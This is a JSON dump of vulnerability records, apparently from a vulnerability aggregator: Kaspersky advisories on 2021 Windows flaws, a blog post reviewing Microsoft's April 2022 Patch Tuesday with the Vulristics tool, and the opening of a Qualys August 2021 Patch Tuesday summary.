7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-28T14:21:07", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-26443](<https://nvd.nist.gov/vuln/detail/CVE-2021-26443>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42280](<https://nvd.nist.gov/vuln/detail/CVE-2021-42280>) \n[CVE-2021-42288](<https://nvd.nist.gov/vuln/detail/CVE-2021-42288>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-42276](<https://nvd.nist.gov/vuln/detail/CVE-2021-42276>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-36957](<https://nvd.nist.gov/vuln/detail/CVE-2021-36957>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42279](<https://nvd.nist.gov/vuln/detail/CVE-2021-42279>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n[CVE-2021-42284](<https://nvd.nist.gov/vuln/detail/CVE-2021-42284>) \n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-42286](<https://nvd.nist.gov/vuln/detail/CVE-2021-42286>) \n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-42274](<https://nvd.nist.gov/vuln/detail/CVE-2021-42274>) \n[CVE-2021-42277](<https://nvd.nist.gov/vuln/detail/CVE-2021-42277>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-41378](<https://nvd.nist.gov/vuln/detail/CVE-2021-41378>) \n[CVE-2021-41356](<https://nvd.nist.gov/vuln/detail/CVE-2021-41356>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-41366](<https://nvd.nist.gov/vuln/detail/CVE-2021-41366>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://vulners.com/cve/CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://vulners.com/cve/CVE-2021-41367>)4.6Warning \n[CVE-2021-41371](<https://vulners.com/cve/CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://vulners.com/cve/CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://vulners.com/cve/CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://vulners.com/cve/CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://vulners.com/cve/CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://vulners.com/cve/CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://vulners.com/cve/CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://vulners.com/cve/CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://vulners.com/cve/CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://vulners.com/cve/CVE-2021-42275>)6.5High \n[CVE-2021-38631](<https://vulners.com/cve/CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://vulners.com/cve/CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://vulners.com/cve/CVE-2021-42287>)6.5High \n[CVE-2021-26443](<https://vulners.com/cve/CVE-2021-26443>)7.7Critical \n[CVE-2021-42280](<https://vulners.com/cve/CVE-2021-42280>)4.6Warning \n[CVE-2021-42288](<https://vulners.com/cve/CVE-2021-42288>)3.6Warning \n[CVE-2021-42276](<https://vulners.com/cve/CVE-2021-42276>)6.8High \n[CVE-2021-36957](<https://vulners.com/cve/CVE-2021-36957>)4.6Warning \n[CVE-2021-42279](<https://vulners.com/cve/CVE-2021-42279>)5.1High \n[CVE-2021-42284](<https://vulners.com/cve/CVE-2021-42284>)7.1High \n[CVE-2021-42286](<https://vulners.com/cve/CVE-2021-42286>)4.6Warning \n[CVE-2021-42274](<https://vulners.com/cve/CVE-2021-42274>)2.1Warning \n[CVE-2021-42277](<https://vulners.com/cve/CVE-2021-42277>)4.6Warning \n[CVE-2021-41378](<https://vulners.com/cve/CVE-2021-41378>)6.5High \n[CVE-2021-41356](<https://vulners.com/cve/CVE-2021-41356>)5.0Warning \n[CVE-2021-41366](<https://vulners.com/cve/CVE-2021-41366>)4.6Warning\n\n### *KB list*:\n[5007260](<http://support.microsoft.com/kb/5007260>) \n[5007255](<http://support.microsoft.com/kb/5007255>) \n[5007206](<http://support.microsoft.com/kb/5007206>) \n[5007207](<http://support.microsoft.com/kb/5007207>) \n[5007186](<http://support.microsoft.com/kb/5007186>) \n[5007192](<http://support.microsoft.com/kb/5007192>) \n[5007215](<http://support.microsoft.com/kb/5007215>) \n[5007205](<http://support.microsoft.com/kb/5007205>) \n[5007245](<http://support.microsoft.com/kb/5007245>) \n[5007247](<http://support.microsoft.com/kb/5007247>) \n[5007189](<http://support.microsoft.com/kb/5007189>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12345 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2023-09-28T00:00:00", "id": "KLA12345", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12345/", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:57:59", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36948](<https://nvd.nist.gov/vuln/detail/CVE-2021-36948>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-26433](<https://nvd.nist.gov/vuln/detail/CVE-2021-26433>) \n[CVE-2021-36945](<https://nvd.nist.gov/vuln/detail/CVE-2021-36945>) \n[CVE-2021-26432](<https://nvd.nist.gov/vuln/detail/CVE-2021-26432>) \n[CVE-2021-36926](<https://nvd.nist.gov/vuln/detail/CVE-2021-36926>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34487](<https://nvd.nist.gov/vuln/detail/CVE-2021-34487>) \n[CVE-2021-34530](<https://nvd.nist.gov/vuln/detail/CVE-2021-34530>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n[CVE-2021-34534](<https://nvd.nist.gov/vuln/detail/CVE-2021-34534>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34486](<https://nvd.nist.gov/vuln/detail/CVE-2021-34486>) \n[CVE-2021-36932](<https://nvd.nist.gov/vuln/detail/CVE-2021-36932>) \n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-26431](<https://nvd.nist.gov/vuln/detail/CVE-2021-26431>) \n[CVE-2021-26426](<https://nvd.nist.gov/vuln/detail/CVE-2021-26426>) \n[CVE-2021-34536](<https://nvd.nist.gov/vuln/detail/CVE-2021-34536>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36933](<https://nvd.nist.gov/vuln/detail/CVE-2021-36933>) \n[CVE-2021-36938](<https://nvd.nist.gov/vuln/detail/CVE-2021-36938>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4023814](<http://support.microsoft.com/kb/4023814>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005031](<http://support.microsoft.com/kb/5005031>) \n[5005033](<http://support.microsoft.com/kb/5005033>) \n[5005030](<http://support.microsoft.com/kb/5005030>) \n[5005106](<http://support.microsoft.com/kb/5005106>) \n[5005040](<http://support.microsoft.com/kb/5005040>) \n[5005099](<http://support.microsoft.com/kb/5005099>) \n[5005043](<http://support.microsoft.com/kb/5005043>) \n[5005076](<http://support.microsoft.com/kb/5005076>) \n[5005094](<http://support.microsoft.com/kb/5005094>) \n[5011535](<http://support.microsoft.com/kb/5011535>) \n[5011564](<http://support.microsoft.com/kb/5011564>) \n[5011560](<http://support.microsoft.com/kb/5011560>) \n[5011527](<http://support.microsoft.com/kb/5011527>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12259 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36945", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-10-18T00:00:00", "id": "KLA12259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12259/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-04-23T12:23:39", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. Because it's not just Tenable, Qualys, Rapid7 and ZDI make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239085>\n\nYou can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So, now you can add any links with CVE comments to Vulristics.\n\nFor April Patch Tuesday I will add these sources:\n\n * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)\n * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)\n * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)\n * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)\n * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)\n\nLet's see if they highlight different sets of vulnerabilities.\n \n \n $ cat comments_links.txt\n Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday\n ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review\n Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/\n KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/\n ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs\n TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html\n Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/\n\nI have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn't fix their blog search (apparently no one uses it). ZDI don't have a blog search, and duckduckgo stopped indexing them properly. \n\nIn addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this.\n\nBut in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. I have added socks proxy support to Vulristics.\n \n \n vulners_key = \"SFKJKEWRID2JFIJ...AAK3DHKSJD\"\n proxies = {\n 'http': \"socks5://<host>:<port>\",\n 'https': \"socks5://<host>:<port>\"\n }\n\nI run the command like this:\n \n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"April\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n\nJust like last month, I'm taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). There are a total of 157 CVEs in the report.\n \n \n MS PT Year: 2022\n MS PT Month: April\n MS PT Date: 2022-04-12\n MS PT CVEs found: 117\n Ext MS PT Date from: 2022-03-09\n Ext MS PT Date to: 2022-04-11\n Ext MS PT CVEs found: 40\n ALL MS PT CVEs: 157\n\n * Critical: 5\n * High: 51\n * Medium: 91\n * Low: 10\n\nLet's start with the critical ones:\n\n * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency.\n * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending \u201ca specially crafted RPC call to an RPC host.\u201d The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machine where RPC can be reached. A proof of concept of this vulnerability [is available on giithub](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). \n * ****Remote Code Execution**** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In Vulristics report it was detected as **Unknown Vulnerability Type** because it's impossible to detect vulnerability type by description. "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is a well-known 0day RCE in Chrome, that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that "Public exploit is found at Vulners". However, it's just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". Yes, it is difficult to determine what exactly was uploaded on github.\n\nNow let's see the most interesting vulnerabilities with the High level.\n\n * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. Not only is PoC out there for it, there\u2019s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve.\n * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>).\n * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month.\n\nFor the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones.\n\n * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well.\n * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. Exploitability Assessment: Exploitation More Likely.\n\nAs you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities.\n\nThe full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T09:22:32", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26812", "CVE-2022-26814", "CVE-2022-26829", "CVE-2022-26904"], "modified": "2022-04-23T09:22:32", "id": "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "href": "https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over windows domain Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### 